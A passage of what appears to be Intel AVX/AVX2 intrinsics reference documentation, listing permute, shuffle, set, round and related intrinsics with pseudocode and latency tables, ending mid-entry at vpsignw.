SELECT4(src, control){ CASE(control[1:0]) 0: tmp[63:0] := src[63:0] 1: tmp[63:0] := src[127:64] 2: tmp[63:0] := src[191:128] 3: tmp[63:0] := src[255:192] ESAC RETURN tmp[63:0] } dst[63:0] := SELECT4(a[255:0], imm8[1:0]) dst[127:64] := SELECT4(a[255:0], imm8[3:2]) dst[191:128] := SELECT4(a[255:0], imm8[5:4]) dst[255:192] := SELECT4(a[255:0], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
vpermilpd
__m128d _mm_permutevar_pd (__m128d a, __m128i b)

Synopsis

__m128d _mm_permutevar_pd (__m128d a, __m128i b)
#include «immintrin.h»
Instruction: vpermilpd xmm, xmm, xmm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a using the control in b, and store the results in dst.

Operation

IF (b[1] == 0) dst[63:0] := a[63:0] IF (b[1] == 1) dst[63:0] := a[127:64] IF (b[65] == 0) dst[127:64] := a[63:0] IF (b[65] == 1) dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilpd
__m256d _mm256_permutevar_pd (__m256d a, __m256i b)

Synopsis

__m256d _mm256_permutevar_pd (__m256d a, __m256i b)
#include «immintrin.h»
Instruction: vpermilpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements in a within 128-bit lanes using the control in b, and store the results in dst.

Operation

IF (b[1] == 0) dst[63:0] := a[63:0] IF (b[1] == 1) dst[63:0] := a[127:64] IF (b[65] == 0) dst[127:64] := a[63:0] IF (b[65] == 1) dst[127:64] := a[127:64] IF (b[129] == 0) dst[191:128] := a[191:128] IF (b[129] == 1) dst[191:128] := a[255:192] IF (b[193] == 0) dst[255:192] := a[191:128] IF (b[193] == 1) dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpermilps
__m128 _mm_permutevar_ps (__m128 a, __m128i b)

Synopsis

__m128 _mm_permutevar_ps (__m128 a, __m128i b)
#include «immintrin.h»
Instruction: vpermilps xmm, xmm, xmm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a using the control in b, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], b[1:0]) dst[63:32] := SELECT4(a[127:0], b[33:32]) dst[95:64] := SELECT4(a[127:0], b[65:64]) dst[127:96] := SELECT4(a[127:0], b[97:96]) dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
vpermilps
__m256 _mm256_permutevar_ps (__m256 a, __m256i b)

Synopsis

__m256 _mm256_permutevar_ps (__m256 a, __m256i b)
#include «immintrin.h»
Instruction: vpermilps ymm, ymm, ymm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in b, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], b[1:0]) dst[63:32] := SELECT4(a[127:0], b[33:32]) dst[95:64] := SELECT4(a[127:0], b[65:64]) dst[127:96] := SELECT4(a[127:0], b[97:96]) dst[159:128] := SELECT4(a[255:128], b[129:128]) dst[191:160] := SELECT4(a[255:128], b[161:160]) dst[223:192] := SELECT4(a[255:128], b[193:192]) dst[255:224] := SELECT4(a[255:128], b[225:224]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpermd
__m256i _mm256_permutevar8x32_epi32 (__m256i a, __m256i idx)

Synopsis

__m256i _mm256_permutevar8x32_epi32 (__m256i a, __m256i idx)
#include «immintrin.h»
Instruction: vpermd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle 32-bit integers in a across lanes using the corresponding index in idx, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 id := idx[i+2:i]*32 dst[i+31:i] := a[id+31:id] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpermps
__m256 _mm256_permutevar8x32_ps (__m256 a, __m256i idx)

Synopsis

__m256 _mm256_permutevar8x32_ps (__m256 a, __m256i idx)
#include «immintrin.h»
Instruction: vpermps ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle single-precision (32-bit) floating-point elements in a across lanes using the corresponding index in idx.

Operation

FOR j := 0 to 7 i := j*32 id := idx[i+2:i]*32 dst[i+31:i] := a[id+31:id] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
vrcpps
__m256 _mm256_rcp_ps (__m256 a)

Synopsis

__m256 _mm256_rcp_ps (__m256 a)
#include «immintrin.h»
Instruction: vrcpps ymm, ymm
CPUID Flags: AVX

Description

Compute the approximate reciprocal of packed single-precision (32-bit) floating-point elements in a, and store the results in dst. The maximum relative error for this approximation is less than 1.5*2^-12.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := APPROXIMATE(1.0/a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 1
Ivy Bridge 7 1
Sandy Bridge 7 1
vroundpd
__m256d _mm256_round_pd (__m256d a, int rounding)

Synopsis

__m256d _mm256_round_pd (__m256d a, int rounding)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a using the rounding parameter, and store the results as packed double-precision floating-point elements in dst.
Rounding is done according to the rounding parameter, which can be one of:

(_MM_FROUND_TO_NEAREST_INT |_MM_FROUND_NO_EXC) // round to nearest, and suppress exceptions (_MM_FROUND_TO_NEG_INF |_MM_FROUND_NO_EXC) // round down, and suppress exceptions (_MM_FROUND_TO_POS_INF |_MM_FROUND_NO_EXC) // round up, and suppress exceptions (_MM_FROUND_TO_ZERO |_MM_FROUND_NO_EXC) // truncate, and suppress exceptions _MM_FROUND_CUR_DIRECTION // use MXCSR.RC; see _MM_SET_ROUNDING_MODE

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ROUND(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_round_ps (__m256 a, int rounding)

Synopsis

__m256 _mm256_round_ps (__m256 a, int rounding)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a using the rounding parameter, and store the results as packed single-precision floating-point elements in dst.
Rounding is done according to the rounding parameter, which can be one of:

(_MM_FROUND_TO_NEAREST_INT |_MM_FROUND_NO_EXC) // round to nearest, and suppress exceptions (_MM_FROUND_TO_NEG_INF |_MM_FROUND_NO_EXC) // round down, and suppress exceptions (_MM_FROUND_TO_POS_INF |_MM_FROUND_NO_EXC) // round up, and suppress exceptions (_MM_FROUND_TO_ZERO |_MM_FROUND_NO_EXC) // truncate, and suppress exceptions _MM_FROUND_CUR_DIRECTION // use MXCSR.RC; see _MM_SET_ROUNDING_MODE

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ROUND(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vrsqrtps
__m256 _mm256_rsqrt_ps (__m256 a)

Synopsis

__m256 _mm256_rsqrt_ps (__m256 a)
#include «immintrin.h»
Instruction: vrsqrtps ymm, ymm
CPUID Flags: AVX

Description

Compute the approximate reciprocal square root of packed single-precision (32-bit) floating-point elements in a, and store the results in dst. The maximum relative error for this approximation is less than 1.5*2^-12.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := APPROXIMATE(1.0 / SQRT(a[i+31:i])) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 1
Ivy Bridge 7 1
Sandy Bridge 7 1
vpsadbw
__m256i _mm256_sad_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sad_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsadbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute differences of packed unsigned 8-bit integers in a and b, then horizontally sum each consecutive 8 differences to produce four unsigned 16-bit integers, and pack these unsigned 16-bit integers in the low 16 bits of 64-bit elements in dst.

Operation

FOR j := 0 to 31 i := j*8 tmp[i+7:i] := ABS(a[i+7:i] — b[i+7:i]) ENDFOR FOR j := 0 to 4 i := j*64 dst[i+15:i] := tmp[i+7:i] + tmp[i+15:i+8] + tmp[i+23:i+16] + tmp[i+31:i+24] + tmp[i+39:i+32] + tmp[i+47:i+40] + tmp[i+55:i+48] + tmp[i+63:i+56] dst[i+63:i+16] := 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
__m256i _mm256_set_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)

Synopsis

__m256i _mm256_set_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 16-bit integers in dst with the supplied values.

Operation

dst[15:0] := e0 dst[31:16] := e1 dst[47:32] := e2 dst[63:48] := e3 dst[79:64] := e4 dst[95:80] := e5 dst[111:96] := e6 dst[127:112] := e7 dst[145:128] := e8 dst[159:144] := e9 dst[175:160] := e10 dst[191:176] := e11 dst[207:192] := e12 dst[223:208] := e13 dst[239:224] := e14 dst[255:240] := e15 dst[MAX:256] := 0
__m256i _mm256_set_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)

Synopsis

__m256i _mm256_set_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 32-bit integers in dst with the supplied values.

Operation

dst[31:0] := e0 dst[63:32] := e1 dst[95:64] := e2 dst[127:96] := e3 dst[159:128] := e4 dst[191:160] := e5 dst[223:192] := e6 dst[255:224] := e7 dst[MAX:256] := 0
__m256i _mm256_set_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)

Synopsis

__m256i _mm256_set_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 64-bit integers in dst with the supplied values.

Operation

dst[63:0] := e0 dst[127:64] := e1 dst[191:128] := e2 dst[255:192] := e3 dst[MAX:256] := 0
__m256i _mm256_set_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, chare24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)

Synopsis

__m256i _mm256_set_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, chare9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 8-bit integers in dst with the supplied values in reverse order.

Operation

dst[7:0] := e0 dst[15:8] := e1 dst[23:16] := e2 dst[31:24] := e3 dst[39:32] := e4 dst[47:40] := e5 dst[55:48] := e6 dst[63:56] := e7 dst[71:64] := e8 dst[79:72] := e9 dst[87:80] := e10 dst[95:88] := e11 dst[103:96] := e12 dst[111:104] := e13 dst[119:112] := e14 dst[127:120] := e15 dst[135:128] := e16 dst[143:136] := e17 dst[151:144] := e18 dst[159:152] := e19 dst[167:160] := e20 dst[175:168] := e21 dst[183:176] := e22 dst[191:184] := e23 dst[199:192] := e24 dst[207:200] := e25 dst[215:208] := e26 dst[223:216] := e27 dst[231:224] := e28 dst[239:232] := e29 dst[247:240] := e30 dst[255:248] := e31 dst[MAX:256] := 0
vinsertf128
__m256 _mm256_set_m128 (__m128 hi, __m128 lo)

Synopsis

__m256 _mm256_set_m128 (__m128 hi, __m128 lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256 vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256d _mm256_set_m128d (__m128d hi, __m128d lo)

Synopsis

__m256d _mm256_set_m128d (__m128d hi, __m128d lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256d vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_set_m128i (__m128i hi, __m128i lo)

Synopsis

__m256i _mm256_set_m128i (__m128i hi, __m128i lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256i vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
__m256d _mm256_set_pd (double e3, double e2, double e1, double e0)

Synopsis

__m256d _mm256_set_pd (double e3, double e2, double e1, double e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed double-precision (64-bit) floating-point elements in dst with the supplied values.

Operation

dst[63:0] := e0 dst[127:64] := e1 dst[191:128] := e2 dst[255:192] := e3 dst[MAX:256] := 0
__m256 _mm256_set_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)

Synopsis

__m256 _mm256_set_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed single-precision (32-bit) floating-point elements in dst with the supplied values.

Operation

dst[31:0] := e0 dst[63:32] := e1 dst[95:64] := e2 dst[127:96] := e3 dst[159:128] := e4 dst[191:160] := e5 dst[223:192] := e6 dst[255:224] := e7 dst[MAX:256] := 0
__m256i _mm256_set1_epi16 (short a)

Synopsis

__m256i _mm256_set1_epi16 (short a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 16-bit integer a to all all elements of dst. This intrinsic may generate the vpbroadcastw.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi32 (int a)

Synopsis

__m256i _mm256_set1_epi32 (int a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 32-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastd.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi64x (long long a)

Synopsis

__m256i _mm256_set1_epi64x (long long a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 64-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastq.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi8 (char a)

Synopsis

__m256i _mm256_set1_epi8 (char a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 8-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastb.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:256] := 0
__m256d _mm256_set1_pd (double a)

Synopsis

__m256d _mm256_set1_pd (double a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast double-precision (64-bit) floating-point value a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0
__m256 _mm256_set1_ps (float a)

Synopsis

__m256 _mm256_set1_ps (float a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast single-precision (32-bit) floating-point value a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_setr_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)

Synopsis

__m256i _mm256_setr_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 16-bit integers in dst with the supplied values in reverse order.

Operation

dst[15:0] := e15 dst[31:16] := e14 dst[47:32] := e13 dst[63:48] := e12 dst[79:64] := e11 dst[95:80] := e10 dst[111:96] := e9 dst[127:112] := e8 dst[145:128] := e7 dst[159:144] := e6 dst[175:160] := e5 dst[191:176] := e4 dst[207:192] := e3 dst[223:208] := e2 dst[239:224] := e1 dst[255:240] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)

Synopsis

__m256i _mm256_setr_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 32-bit integers in dst with the supplied values in reverse order.

Operation

dst[31:0] := e7 dst[63:32] := e6 dst[95:64] := e5 dst[127:96] := e4 dst[159:128] := e3 dst[191:160] := e2 dst[223:192] := e1 dst[255:224] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)

Synopsis

__m256i _mm256_setr_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 64-bit integers in dst with the supplied values in reverse order.

Operation

dst[63:0] := e3 dst[127:64] := e2 dst[191:128] := e1 dst[255:192] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, chare24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)

Synopsis

__m256i _mm256_setr_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, chare9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 8-bit integers in dst with the supplied values in reverse order.

Operation

dst[7:0] := e31 dst[15:8] := e30 dst[23:16] := e29 dst[31:24] := e28 dst[39:32] := e27 dst[47:40] := e26 dst[55:48] := e25 dst[63:56] := e24 dst[71:64] := e23 dst[79:72] := e22 dst[87:80] := e21 dst[95:88] := e20 dst[103:96] := e19 dst[111:104] := e18 dst[119:112] := e17 dst[127:120] := e16 dst[135:128] := e15 dst[143:136] := e14 dst[151:144] := e13 dst[159:152] := e12 dst[167:160] := e11 dst[175:168] := e10 dst[183:176] := e9 dst[191:184] := e8 dst[199:192] := e7 dst[207:200] := e6 dst[215:208] := e5 dst[223:216] := e4 dst[231:224] := e3 dst[239:232] := e2 dst[247:240] := e1 dst[255:248] := e0 dst[MAX:256] := 0
vinsertf128
__m256 _mm256_setr_m128 (__m128 lo, __m128 hi)

Synopsis

__m256 _mm256_setr_m128 (__m128 lo, __m128 hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256 vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256d _mm256_setr_m128d (__m128d lo, __m128d hi)

Synopsis

__m256d _mm256_setr_m128d (__m128d lo, __m128d hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256d vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_setr_m128i (__m128i lo, __m128i hi)

Synopsis

__m256i _mm256_setr_m128i (__m128i lo, __m128i hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256i vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
__m256d _mm256_setr_pd (double e3, double e2, double e1, double e0)

Synopsis

__m256d _mm256_setr_pd (double e3, double e2, double e1, double e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed double-precision (64-bit) floating-point elements in dst with the supplied values in reverse order.

Operation

dst[63:0] := e3 dst[127:64] := e2 dst[191:128] := e1 dst[255:192] := e0 dst[MAX:256] := 0
__m256 _mm256_setr_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)

Synopsis

__m256 _mm256_setr_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed single-precision (32-bit) floating-point elements in dst with the supplied values in reverse order.

Operation

dst[31:0] := e7 dst[63:32] := e6 dst[95:64] := e5 dst[127:96] := e4 dst[159:128] := e3 dst[191:160] := e2 dst[223:192] := e1 dst[255:224] := e0 dst[MAX:256] := 0
vxorpd
__m256d _mm256_setzero_pd (void)

Synopsis

__m256d _mm256_setzero_pd (void)
#include «immintrin.h»
Instruction: vxorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256d with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vxorps
__m256 _mm256_setzero_ps (void)

Synopsis

__m256 _mm256_setzero_ps (void)
#include «immintrin.h»
Instruction: vxorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256 with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpxor
__m256i _mm256_setzero_si256 (void)

Synopsis

__m256i _mm256_setzero_si256 (void)
#include «immintrin.h»
Instruction: vpxor ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256i with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpshufd
__m256i _mm256_shuffle_epi32 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shuffle_epi32 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshufd ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 32-bit integers in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(a[255:128], imm8[5:4]) dst[255:224] := SELECT4(a[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpshufb
__m256i _mm256_shuffle_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_shuffle_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpshufb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle 8-bit integers in a within 128-bit lanes according to shuffle control mask in the corresponding 8-bit element of b, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 IF b[i+7] == 1 dst[i+7:i] := 0 ELSE index[3:0] := b[i+3:i] dst[i+7:i] := a[index*8+7:index*8] FI IF b[128+i+7] == 1 dst[128+i+7:128+i] := 0 ELSE index[3:0] := b[128+i+3:128+i] dst[128+i+7:128+i] := a[128+index*8+7:128+index*8] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vshufpd
__m256d _mm256_shuffle_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_shuffle_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vshufpd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

dst[63:0] := (imm8[0] == 0) ? a[63:0] : a[127:64] dst[127:64] := (imm8[1] == 0) ? b[63:0] : b[127:64] dst[191:128] := (imm8[2] == 0) ? a[191:128] : a[255:192] dst[255:192] := (imm8[3] == 0) ? b[191:128] : b[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vshufps
__m256 _mm256_shuffle_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_shuffle_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vshufps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(b[127:0], imm8[5:4]) dst[127:96] := SELECT4(b[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(b[255:128], imm8[5:4]) dst[255:224] := SELECT4(b[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpshufhw
__m256i _mm256_shufflehi_epi16 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shufflehi_epi16 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshufhw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 16-bit integers in the high 64 bits of 128-bit lanes of a using the control in imm8. Store the results in the high 64 bits of 128-bit lanes of dst, with the low 64 bits of 128-bit lanes being copied from from a to dst.

Operation

dst[63:0] := a[63:0] dst[79:64] := (a >> (imm8[1:0] * 16))[79:64] dst[95:80] := (a >> (imm8[3:2] * 16))[79:64] dst[111:96] := (a >> (imm8[5:4] * 16))[79:64] dst[127:112] := (a >> (imm8[7:6] * 16))[79:64] dst[191:128] := a[191:128] dst[207:192] := (a >> (imm8[1:0] * 16))[207:192] dst[223:208] := (a >> (imm8[3:2] * 16))[207:192] dst[239:224] := (a >> (imm8[5:4] * 16))[207:192] dst[255:240] := (a >> (imm8[7:6] * 16))[207:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpshuflw
__m256i _mm256_shufflelo_epi16 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shufflelo_epi16 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshuflw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 16-bit integers in the low 64 bits of 128-bit lanes of a using the control in imm8. Store the results in the low 64 bits of 128-bit lanes of dst, with the high 64 bits of 128-bit lanes being copied from from a to dst.

Operation

dst[15:0] := (a >> (imm8[1:0] * 16))[15:0] dst[31:16] := (a >> (imm8[3:2] * 16))[15:0] dst[47:32] := (a >> (imm8[5:4] * 16))[15:0] dst[63:48] := (a >> (imm8[7:6] * 16))[15:0] dst[127:64] := a[127:64] dst[143:128] := (a >> (imm8[1:0] * 16))[143:128] dst[159:144] := (a >> (imm8[3:2] * 16))[143:128] dst[175:160] := (a >> (imm8[5:4] * 16))[143:128] dst[191:176] := (a >> (imm8[7:6] * 16))[143:128] dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpsignw
__m256i _mm256_sign_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 16-bit integers in a when the corresponding signed 16-bit integer in b is negative, and store the results in dst. Element in dst are zeroed out when the corresponding element in b is zero.

Operation

